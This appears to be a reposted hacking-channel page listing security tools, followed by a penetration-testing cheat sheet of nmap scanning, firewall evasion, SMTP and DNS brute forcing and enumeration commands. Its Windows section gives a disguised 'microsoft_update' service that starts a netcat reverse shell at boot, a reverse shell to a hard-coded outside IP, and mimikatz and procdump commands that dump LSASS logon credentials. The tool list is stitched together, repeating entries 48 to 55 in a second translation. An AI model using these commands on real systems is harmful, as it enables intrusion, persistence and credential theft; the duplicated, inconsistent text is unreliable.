19) THC Amap
Amap can identify which program is listening on a given port. Because of its distinctive version-detection approach, its signature database does not grow as large as Nmap's. It is worth trying when Nmap fails to identify a service or other tools do not work. Another feature of Amap is its ability to parse Nmap output files. This is another valuable tool contributed by THC.
20) GFI LANguard
GFI LANguard addresses the three main problems of enterprise network vulnerability management: network scanning, network auditing and patch management. GFI LANguard Network Security Scanner (NSS) is an award-winning solution that scans for, detects, evaluates and repairs security vulnerabilities in the network. As an administrator, you often have to deal with a range of issues, and sometimes use several products to handle network vulnerabilities, patch management and network audits. With GFI LANguard NSS, these three aspects of vulnerability management can be handled from a single console with rich reporting capabilities.
21) Aircrack
Aircrack is a set of tools for cracking WEP and WPA, generally used for recovering wireless network keys, which allows unauthorized entry into a wireless network. Once enough encrypted packets have been collected, it can crack WEP keys of 40 to 512 bits, and it can also attack WPA1 or WPA2 networks through advanced cryptanalytic methods or brute force.
22) Superscan
SuperScan is a free but very powerful tool developed by Foundstone. Compared with many similar tools, it is both a hacking tool and a network security tool. An attacker can use it to collect information about remote network hosts, and its traffic can also act as a denial of service (DoS). As a security tool, SuperScan can help you discover weaknesses in your own network.
23) Netfilter
In layman's terms, the netfilter architecture places a number of detection points (hooks) at several positions along the path a packet takes through the kernel network stack, and registers processing functions on each hook (for packet filtering, NAT and so on, or even user-defined functions).
24) Sysinternals
Sysinternals is a suite of security and system management tools, mainly including:
(1) Process Explorer: a process management tool that can be set to completely replace the system's own task manager (taskmgr) and become the default "task manager". Its built-in monitors display or record the current state of the system very intuitively, and it is very easy to use. Supports XP, Windows 2003 and later.
(2) PsTools: a set of 12 commands in total that can be used to remotely manage Windows NT / 2000 / XP systems. You can remotely defragment a disk, stop the Messenger service on a remote computer, check server disk space, list the processes on a remote computer and terminate suspicious ones, send messages, and quickly shut down a remote computer.
(3) Autoruns: powerful and complete startup item scanning tool!
(4) TCPView: Port detection software, very small and easy to use.
(5) RootkitRevealer: detects whether a rootkit is running on a Windows system. By comparing the view of the registry and file system obtained through the Windows API against a raw scan, it can detect all the rootkits published at www.rootkit.com, including AFX, Vanquish, HackerDefender and others. Note: RootkitRevealer cannot detect rootkits that hide neither files nor registry keys, such as FU_Rootkit.
25) Retina
Retina has been regarded as the most accurate non-agent-based network security scanner in the industry. It contains a very comprehensive vulnerability database maintained by eEye's research and development team. As a professional security product for both distributed enterprise users and users in a stand-alone network environment, Retina has been used by many of the world's largest companies and government departments to check the network security of branches, head offices and government departments, and to correct hidden vulnerabilities and insecure settings in the network.
26) Perl / Python / Ruby
Perl is older than Ruby or Python. Perl was once the most popular scripting language, and was once considered a must for hackers. You can complete complex data processing in just a few lines, and the speed is not necessarily much slower. Its built-in support for regular expressions and data structures is even more impressive. Many websites used to be written in Perl, and even now some older foreign websites still contain Perl code. Perl's greatest strength is its countless libraries: it has one of the largest communities in the world, and you can find a library for almost anything you want. But Perl's shortcomings are also obvious: Perl programs are too flexible, there are usually many solutions to one problem, just as there are many ways to phrase one sentence, and Perl's syntax is completely opaque to people who are not familiar with it. Ruby and Python both appeared as replacements for Perl. The latest Perl adds object-oriented support, and Ruby and Python have better object-oriented support (even better than Java).
27) L0phtcrack
L0phtCrack v5.04, known as LC 5, is an essential tool for network administrators. It can be used to check whether Windows and UNIX users have chosen unsafe passwords, and it cracks Windows NT / 2000 / XP and UNIX administrator account passwords. Experience shows that simple or easily cracked administrator passwords are one of the biggest security threats, because attackers can then log on to systems as legitimate users without being noticed.
28) Scapy
Scapy is a powerful interactive packet processing tool, packet generator, network scanner, network discovery tool and packet sniffer tool. It provides a variety of functions for interactively generating data packets or data packet collections, manipulating data packets, sending data packets, packet sniffing, response and feedback matching, and so on.
29) Sam Spade
Sam Spade provides a friendly GUI and makes it easy to complete a variety of network query tasks. It was originally developed to track down spammers, but can also be used for many other network probing, network management and security-related tasks. It integrates tools including ping, nslookup, whois, dig, traceroute, finger, a raw HTTP browser, DNS zone transfer, SMTP relay check and website search, making it an integrated toolbox.
30) GnuPG / PGP
With the development of network and computer technology, the security of data storage and data exchange has become more and more important, and encryption has long been used for both. To verify the identity of both parties during network data exchange, certificate systems have also matured. GnuPG is a set of tools for encrypting data and creating certificates. Its function is similar to PGP, but PGP uses many patented algorithms.
31) AirSnort
AirSnort exploits weaknesses in the widely used wireless encryption scheme of "Wi-Fi" (802.11b), WEP, which was designed to general standards, in order to enter the network; other encryption schemes have not been broken by AirSnort or WEPCrack. The people who designed AirSnort believe that many Internet users do not appreciate, or cannot understand, the flaws in Wi-Fi's encryption.
32) BackTrack
BackTrack is a self-starting CD based on Slackware and SLAX. It contains a set of security and computer forensics tools. It was actually created by the fusion of Auditor Security Linux and WHAX (formerly Whoppix).
33) P0f
p0f is another passive remote operating system identification tool, alongside Nmap and Xprobe2. It supports: incoming connection SYN mode, outgoing connection SYN+ACK mode, refused connection RST+ mode, and established connection ACK mode. It can also detect whether the remote system is behind a firewall, whether it is behind NAT, whether it is behind a load balancer, how long the remote system has been up, and the DSL and ISP information of the remote system, among other things.
34) Google: a popular search engine.
35) WebScarab
WebScarab is a proxy tool that includes a proxy, web crawling, web spidering, session analysis, an automated scripting interface, a fuzzing tool, encoding / decoding of all popular formats, and a service description language parser.
36) Ntop
Ntop can associate port usage with the owning application, similar to the "netstat -an" command, and can display detailed information such as when a port was opened and how much traffic it has carried. For example, you can map an open TCP / UDP port to the application program using it.
37) Tripwire
Tripwire is currently the best-known file system integrity checking tool for UNIX. The core of its technique is to generate a digital signature (a cryptographic hash) for each monitored file and keep it in a database. When the file's current signature no longer matches the stored one, the file must have been modified.
38) Ngrep
ngrep is a network version of grep (the tool for searching strings in text), and aims to bring as many of grep's features as possible to matching packets. Because ngrep is built on the libpcap library, it supports a large number of operating systems and network protocols. It can recognise TCP, UDP and ICMP packets and understands BPF filter syntax.
39) Nbtscan
Nbtscan is a small tool for scanning NetBIOS information on Windows networks. It can only be used within the local network, and it displays the IP address, host name, user name, MAC address and so on.
40) WebInspect
WebInspect is considered a next-generation web application security testing tool. Its main functions: (1) use innovative assessment techniques to check the security of web services and web applications; (2) evaluation; (3) perform application security testing and collaboration throughout the lifecycle; (4) easily run interactive scans through an advanced user interface; (5) use advanced tools (HP Security Toolkit) to perform penetration tests; (6) can be configured to support any web application environment.
41) OpenSSL
SSL is the abbreviation of Secure Socket Layer, a protocol that provides encrypted transmission over the Internet. The OpenSSL software package can be divided into three main functional parts: the cryptographic algorithm library, the SSL protocol library and the command-line application.
42) Xprobe2
Xprobe2 actively probes the remote host and analyses the characteristics of the ICMP datagrams it sends back using fuzzy matrix statistical analysis, and from this identifies the type of the remote operating system.
43) EtherApe
This network sniffer can perform the same functions as Tcpdump, but its interface is much friendlier. Both Ethereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many ways (for example, they use the same filter rules and keywords). Ethereal works the same way as other graphical network sniffers.
44) Core Impact
Core Impact is recognized as the strongest vulnerability detection tool for comprehensive assessment and detection of, prevention of and response to information security threats. By safely replicating real-world attacks on network servers and workstations, end-user systems and web applications, it helps you find and fix security issues.
45) IDA Pro
IDA Pro is an interactive "analyst". However, it does not solve problems automatically: IDA Pro will flag suspicious instructions but will not resolve them. Your job is to tell IDA how to proceed.
46) SolarWinds
SolarWinds is a professional network management suite that can monitor and discover network devices. The following tools are included:
1) Network Performance Monitoring: Bandwidth measurement, routing CPU load, bandwidth monitoring, CPU measurement, network performance monitor, SNMP image and advanced CPU upload.
2) Network Discovery: subnet list, Ping Sweep, IP network browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning.
3) Tools for Cisco networks: IP network browser, router CPU load, configuration download, configuration upload, configuration editor / browser, proxy ping, comparison of running vs. startup configuration, router password decryption, CPU measurement and advanced CPU upload.
4) Network monitoring: Watch It!, network monitor, Syslog server, router CPU load, advanced ping and network performance monitor.
5) IP Address Management: Advanced subnet calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS verification, IP address management, Ping Sweep.
6) Security: router security check, TCP Reset, dictionary editor, SNMP brute force attack, SNMP dictionary attack, router password decryption.
7) Ping & Diagnostic: ping, advanced ping, Trace Route, Proxy Ping, Ping Sweep.
8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB browser and SNMP images.
9) Others: TFTP server, WAN Killer, Wake-On-LAN.
47) Pwdump: a tool for grabbing password files of Windows users.
48) LSoF
lsof, whose full name is "list open files", lists the files currently open on the system. In the Linux environment everything is a file: a device is a file, a directory is a file, and even a socket is a file. The lsof command is therefore very helpful for day-to-day Linux administration.
49) RainbowCrack
RainbowCrack is a multi-purpose password cracking program. It not only cracks passwords but also works against hash-based schemes: for example, it can crack LM, MD5, SHA1 and custom hashes, and other hash types can be added to the software. It supports both Windows and Linux, and the rainbow tables generated on one system can be converted directly for use on the other. Although it is powerful, it is rather complicated to use.
50) Firewalk
Firewalk is a Linux network security tool that uses traceroute-like techniques to analyse IP packet responses, in order to determine a gateway's access control lists and to map the network.
51) Angry IP Scanner
Angry IP Scanner is an easy-to-use IP and port scanner. It can obtain the ping response time, host name, computer name, workgroup, logged-in user name, MAC address, TTL, NetBIOS information and more for each scanned computer. You can specify ports to scan to see which are open on the target; for live hosts you can open them in Explorer, browse them with a web browser, connect by FTP or telnet, ping or tracert them, or look up the geographic location of the IP on the web. Given just a web address or host name, Angry IP Scanner resolves its IP address and scans it. It also supports automatically selecting and scanning entire Class B and Class C ranges, collecting and managing commonly used IPs, and exporting scan results to several file formats. Because scanning is multi-threaded, Angry IP Scanner can scan dozens of IPs at once and is therefore extremely fast.
52) RKHunter
RKHunter (Rootkit Hunter) can find about 58 known rootkits as well as some sniffers and backdoors. It runs a series of test scripts to confirm whether the machine has been infected with a rootkit.
53) Ike-scan
Ike-scan is a tool for fingerprinting IKE (Internet Key Exchange) services. IKE is the mechanism used to establish a connection between a VPN server and a remote client. After scanning the address range for VPN servers, crafted IKE packets are sent to each host; any host running IKE sends back a response confirming that it exists. The tool then records and displays these responses and compares them against a set of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) is the protocol used to map IP addresses to the hardware addresses of network devices. On Linux, arpwatch can monitor and record the ARP traffic on the local network and report any changes it observes by e-mail.
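The core of what arpwatch does is a table of IP-to-MAC pairings plus alerts when a pairing changes. The following is an added example written for this page, not arpwatch's own code; it replays a constructed set of ARP replies through that logic and returns the alerts arpwatch would normally send by e-mail ("new station", "changed ethernet address", "flip flop"). In production the replies would come from a packet capture rather than the hard-coded list.

```python
"""Added example: arpwatch-style IP/MAC change detection (not arpwatch's own code)."""
from collections import namedtuple

# One ARP reply as a capture would deliver it (fields are constructed for the demo).
ArpReply = namedtuple("ArpReply", "timestamp ip mac")


class ArpWatcher:
    def __init__(self):
        self.table = {}    # ip -> MAC currently believed to own that IP
        self.history = {}  # ip -> set of every MAC ever seen for it

    def observe(self, reply):
        """Update the pairing table and return the alerts this reply triggers."""
        alerts = []
        mac = reply.mac.lower()
        previous = self.table.get(reply.ip)
        seen = self.history.setdefault(reply.ip, set())
        if previous is None:
            alerts.append(f"{reply.timestamp} new station {reply.ip} at {mac}")
        elif previous != mac:
            # A known IP answering from a different MAC is what arpwatch reports as
            # "changed ethernet address"; bouncing between MACs it has already seen
            # is a "flip flop", the classic symptom of two hosts fighting over one IP.
            kind = "flip flop" if mac in seen else "changed ethernet address"
            alerts.append(f"{reply.timestamp} {kind} {reply.ip} {previous} -> {mac}")
        self.table[reply.ip] = mac
        seen.add(mac)
        return alerts


# Constructed sample: the gateway is first seen, later answers from another MAC,
# then switches back. Addresses are made up for the example.
SAMPLE_REPLIES = [
    ArpReply("10:00:01", "192.168.1.1", "00:11:22:33:44:55"),
    ArpReply("10:00:02", "192.168.1.20", "aa:bb:cc:dd:ee:01"),
    ArpReply("10:05:00", "192.168.1.1", "00:11:22:33:44:55"),   # unchanged: no alert
    ArpReply("10:07:30", "192.168.1.1", "AA:BB:CC:DD:EE:02"),   # gateway moved MAC
    ArpReply("10:07:31", "192.168.1.1", "00:11:22:33:44:55"),   # and back again
]


def run(replies=SAMPLE_REPLIES):
    """Feed every reply through one watcher and collect the alerts in order."""
    watcher = ArpWatcher()
    alerts = []
    for reply in replies:
        alerts.extend(watcher.observe(reply))
    return alerts


if __name__ == "__main__":
    for line in run():
        print(line)
```

The "flip flop" on the gateway address is the pattern worth alerting on loudly: a single "changed ethernet address" can be a legitimate hardware replacement, but an IP oscillating between two MACs within seconds almost never is.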
55) KisMAC
KisMAC is a free wireless protocol sniffer for Mac OS X. The KisMAC installer does not set file permissions securely during installation, and a local attacker can use this vulnerability to gain unauthorized access to sensitive file information.
Forty-eight, LSoF
full name list opened files, which is to list the files that have been opened in the system. We know that everything in the Linux environment is a file, the device is a file, the directory is a file, and even sockets are files. Therefore, using the lsof command is very helpful for daily Linux management.
49) RainbowCrack is
a multi-functional password cracking software, which not only can crack passwords, but also is a cracking tool for messy algorithm encryption. For example, it can crack im, md5, sha1, customizable, etc., other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the forms generated on one system can be directly converted to another system for use. Although it is powerful, it is more complicated to use.
50) Firewalk
Linux network security tools use similar traceroute technology to analyze IP packet responses to determine gateway access control lists and tools for drawing network graphs.
51) An
easy-to-use IP and port scanning tool for Angry IP Scanner , which can obtain the ping response time, host name, computer name, workgroup, login user name, MAC address, TTL, NetBios information of the scanned computer, etc. You can specify the scan port to view the open port of the target computer; for the active host, you can perform operations such as opening in the resource manager, browsing with a web browser, FTP, telnet, ping, tracert or using the web page to find the geographic location of the specified IP . With just a web address or host name, Angry IP Scanner can automatically resolve its IP address and scan it. Angry IP Scanner also supports automatic selection and scanning of entire Class B and Class C IP segments, collection and management of commonly used IPs, and export of scan results to multiple file formats. Due to the multi-threaded scanning, Angry IP Scanner can scan dozens of IPs at the same time, so it is extremely fast.
52) RKHunter's
Chinese name "Rootkit Hunter" can find about 58 known rootkits and some sniffer and backdoor programs. It performs a series of test scripts to confirm whether the machine has been infected with rootkits.
53) Ike-scan is
a tool for detecting the transmission characteristics of IKE (Internet Key Exchange) service. IKE is a mechanism for establishing a connection between a server and a remote client in a VPN network. After the IP address of the VPN server is scanned, the reconstructed IKE data packet is distributed to each host in the VPN network. As long as the host running IKE will send back feedback to confirm its existence. The tool then records and displays these feedback packets and compares them with a series of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) is a protocol used to resolve IP and hardware addresses of network devices. Under Linux system, arpwatch can monitor and record ARP packets in the regional network, and report the monitored changes through E-mail.
55) KisMAC
A free wireless sniffer for Mac OS X. The KisMAC installer did not set file permissions securely, and a local attacker could exploit this to gain unauthorized access to sensitive files.
56) OSSEC HIDS
An open-source host-based intrusion detection system that provides log analysis, integrity checking and rootkit detection. As a HIDS, OSSEC is installed on the host being monitored. You do not always need the full installation: with several machines, run it in agent/server mode, where the agent program forwards its data to the server for analysis. Monitoring many systems from one server this way is economical and practical for both business and home users. OSSEC's biggest advantage is that it runs on almost any operating system: Windows, Linux, OpenBSD/FreeBSD and macOS. Note, however, that the Windows agent cannot perform rootkit detection; agents on the other platforms have no such limitation.
57) OpenBSD PF
OpenBSD users love PF, their native firewall. Its functions include network address translation, management of TCP/IP traffic, bandwidth control and packet prioritization (queueing). It also has extras such as passive operating system fingerprinting. PF was written by the same people who write OpenBSD, and it has been carefully reviewed, designed and coded to avoid the kinds of vulnerabilities found in other packet filters.
58) Nemesis: a command-line packet crafting and injection utility. It is not limited to ICMP; it can build and send ARP, DNS, Ethernet, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets with arbitrary header fields.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 57 MOST DANGEROUS TOOLS TESTED - use for security, not for harm
#SUPPORT & SHARE
T.me/UndercodeTesting
π¦ Collection of practical skills of penetration testing Fast tips @undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best NMAP scanning strategy
# The best nmap scanning strategy for networks of all sizes

# Host discovery: generate a list of live hosts (ping scan only, no port scan)
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

# Port discovery: the most commonly used ports (nmap's default top 1000 ports per protocol)
# https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
# -Pn skips host discovery because LiveHosts.txt already contains only live hosts
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

# Port discovery: all 65536 ports (the UDP pass is very slow)
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

# Display the open TCP / UDP ports as nmap port specs (T:..., U:...) for the next step
$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'
$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'
# Caution: a plain grep for "open" also matches the open|filtered UDP state and the
# "Not shown: N open|filtered ports" summary line, so check the UDP list by hand.

# Service version detection
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
# Operating system detection
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# OS and service detection on a chosen set of UDP and TCP ports
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
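The grep/cut pipelines are the fragile part of this strategy, so here is an added example (not from the original page) that runs the page's pipeline and a hardened version side by side over constructed sample nmap output. The sample greppable (-oG) and normal (-oN) output, and the live_hosts, page_open_ports and open_ports function names, are assumptions of this example; the hardened version keys on "<port>/<proto> open" rather than on the word "open" anywhere in the line.

```shell
#!/bin/sh
# Added example (not from the original page): the post-processing steps of the
# scanning strategy above, run offline against CONSTRUCTED nmap output in the
# greppable (-oG) and normal (-oN) formats the commands above produce.

# Constructed sample of `nmap -sn -oG Discovery.gnmap` output
# (real output separates "()" and "Status:" with a tab; field 2 is the IP either way).
DISCOVERY_GNMAP='# Nmap 7.80 scan initiated as: nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
Host: 192.168.56.1 () Status: Up
Host: 192.168.56.101 () Status: Up
Host: 192.168.56.102 () Status: Down
# Nmap done: 256 IP addresses (2 hosts up) scanned'

# Constructed sample of `nmap -sS -p 0-65535 -oN FullTCP` output.
FULLTCP='# Nmap 7.80 scan initiated as: nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  open     https
8080/tcp filtered http-proxy
# Nmap done'

# Constructed sample of `nmap -sU -p 0-65535 -oN FullUDP` output. Both the
# "open|filtered" state and the "Not shown: ... open|filtered ports" summary
# contain the word "open".
FULLUDP='# Nmap 7.80 scan initiated as: nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
Nmap scan report for 192.168.56.101
Not shown: 65533 open|filtered ports
PORT     STATE         SERVICE
53/udp   open|filtered domain
123/udp  closed        ntp
161/udp  open          snmp
# Nmap done'

# Live hosts from greppable ping-scan output: the page's grep/cut pipeline.
live_hosts() {
    grep 'Status: Up' | cut -f 2 -d ' '
}

# The page's port pipeline as written: any line containing "open" is a port line.
# $1 is the prefix (T or U).
page_open_ports() {
    grep 'open' | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' \
        | xargs | sed 's/ /,/g' | awk -v p="$1" '{print p ":" $0}'
}

# Hardened version: only "<number>/tcp|udp" lines whose state is exactly "open".
# Requiring whitespace (or end of line) after "open" drops "open|filtered", and
# anchoring on the port number drops the "Not shown" summary line.
open_ports() {
    grep -E '^[0-9]+/(tcp|udp) +open( |$)' | cut -f 1 -d '/' | sort -nu \
        | paste -s -d ',' - | awk -v p="$1" 'NF { print p ":" $0 }'
}

# Run both over the constructed samples.
printf '%s\n' "$DISCOVERY_GNMAP" | live_hosts
printf '%s\n' "$FULLTCP" | page_open_ports T    # fine for TCP
printf '%s\n' "$FULLUDP" | page_open_ports U    # "Not" and 53 leak into the list
printf '%s\n' "$FULLTCP" | open_ports T
printf '%s\n' "$FULLUDP" | open_ports U
```

Feed real FullTCP/FullUDP files to open_ports with the usual redirection; the resulting "T:22,80,443" and "U:161" strings drop straight into the -p option of the OS/service detection scan. If you do want the ambiguous open|filtered UDP ports included, relax the pattern to "open(\|filtered)?" deliberately rather than matching the bare word.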
π¦ Nmap: perform web vulnerability scanning
> cd /usr/share/nmap/scripts/
> wget [vulscan download URL]   # nmap_nse_vulscan-2.0.tar.gz, from the project's git repository or website
> tar xzf nmap_nse_vulscan-2.0.tar.gz
> nmap -sS -sV --script=vulscan/vulscan.nse target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
> nmap -Pn -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
> nmap -sV --script=vuln target
> nmap -Pn -sS -sV --script=all --script-args vulscancorrelation=1 target
Note: vulscan only matches the version banner from -sV against its CSV databases (scipvuldb.csv and others), so its hits are unverified banner matches, not confirmed vulnerabilities. --script=vuln runs the NSE "vuln" category; --script=all runs every NSE script, including the intrusive and dos categories, so do not point it at production systems. -Pn (written -PN in older nmap versions) skips host discovery.
π¦ Use DIRB to brute-force directories
Note: DIRB is a tool dedicated to brute-forcing web directories and is installed by default in Kali. Similar tools include patator, dirsearch, DirBuster and the Chinese tool 御剑 (Yujian).
> dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
π¦ Nmap: avoiding the firewall
# Fragmentation: split probes into tiny 8-byte fragments so simple packet filters never see a full TCP header
> $ nmap -f [target]
# Choose the fragment size yourself; it must be a multiple of 8 (8, 16, 24, 32, ...)
> $ nmap --mtu 24 [target]
# Cloak the scan among 10 randomly generated decoy source addresses
> $ nmap -D RND:10 [target]
# Specify the decoy IPs by hand
> $ nmap -D decoy1,decoy2,decoy3 [target]
# Idle (zombie) scan: first find an idle host with a predictable, incremental IP ID sequence to use as the zombie
> $ nmap -sI [Zombie IP] [Target IP]
# Set the source port (80 or 53 are often allowed through by naive filters)
> $ nmap --source-port 80 IP
# Append random data to every probe packet to change its size
> $ nmap --data-length 25 IP
# MAC address spoofing: a vendor name picks a random MAC from that vendor's OUI range
> $ nmap --spoof-mac Dell/Apple/3Com IP
Caveats: stateful firewalls and IDS reassemble fragments before inspection, so -f and --mtu only beat the simplest filters; decoys do not hide your real address (your own probes are still sent, and egress filtering may drop the spoofed ones); --spoof-mac only matters on the local segment, because the first router rewrites the MAC; and the idle scan is only as stealthy as the zombie, which must be genuinely idle or the IP ID samples will be noisy.
π¦ More practical hacking tips by undercode:
t.me/undercodeTesting
π¦ Patator: all-around brute-force testing tool
# git clone https://github.com/lanjelot/patator.git /usr/share/patator
# SMTP brute force (FILE0 / FILE1 are filled from the numbered wordlists)
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
# -x ignore:fgrep=... hides responses containing that string, so only successful logins remain in the output
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
π¦ Use Fierce to brute-force DNS
Note: Fierce first checks whether the DNS server allows zone transfers (AXFR). If it does, Fierce performs the transfer and reports the result; if not, it enumerates host names by querying the server with a wordlist. Similar tools: subDomainsBrute and SubBrute.
# https://ha.ckers.org/fierce/
$ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
π¦ Scan web services with Nikto
# -C all: check every known CGI directory
$ nikto -C all -h https://IP
π¦ WordPress
$ git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
# --enumerate p: enumerate installed plugins
$ ./wpscan --url https://IP/ --enumerate p
π¦ HTTP fingerprinting
$ wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
$ cd httprint_301/linux/
$ ./httprint -h http://IP -s signatures.txt
π¦ Scan with Skipfish
Note: Skipfish is a web application security reconnaissance tool. It builds an interactive site map with a recursive crawler and dictionary-based probes, then annotates that map with the results of its security checks.
$ skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
π¦ Scan with NC
$ nc -v -w 1 target -z 1-1000
$ for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
π¦ Unicornscan
Note: Unicornscan is a tool for information gathering and security auditing.
$ us -H -msf -Iv 192.168.56.101 -p 1-65535
$ us -H -mU -Iv 192.168.56.101 -p 1-65535
-H   resolve host names during report generation
-m   scan mode (sf = TCP SYN scan, U = UDP scan)
-Iv  immediate, verbose output
π¦ OS fingerprinting with Xprobe2
$ xprobe2 -v -p tcp:80:open IP
π¦ Enumerate Samba
$ nmblookup -A target
$ smbclient //MOUNT/share -I target -N
$ rpcclient -U "" target
$ enum4linux target
π¦ Enumerate SNMP
# snmpget needs an OID to query; sysDescr.0 is the usual first one
$ snmpget -v 1 -c public IP sysDescr.0
$ snmpwalk -v 1 -c public IP
$ snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
π¦ Practical Windows cmd commands
> net localgroup Users
> net localgroup Administrators
# search the disk for .doc files
> dir /s *.doc
# from a web shell or script: system("start cmd.exe /k $cmd")
# persistence: a service that starts a netcat reverse shell at boot (sc needs the space after each "=")
> sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
# reverse shell back to the attacker's listener
> cmd /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
# dump logon credentials from LSASS with mimikatz
> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
# dump LSASS memory with procdump and parse the dump offline with mimikatz
> procdump.exe -accepteula -ma lsass.exe lsass.dmp
> mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
> C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp        (32-bit system)
> C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp    (64-bit system)
π¦ What about hijacking Wi-Fi?
1) Hijacker is a penetration testing tool with a graphical user interface. It integrates several well-known Wi-Fi tools such as Aircrack-ng, Airodump-ng, MDK3 and Reaver.
2) Hijacker provides a simple, easy-to-use UI, so users do not have to type commands or copy and paste MAC addresses on a console.
3) The application is only available for Android (ARM) and requires a wireless chipset that supports monitor mode. At present only a few devices qualify, so you may need custom firmware.
4) The Nexus 5 and other devices with the BCM4339 chip can install Nexmon [download address]; devices with the BCM4329/BCM4330 chips can install bcmon [download address].
Note: the device must be rooted to use the tool.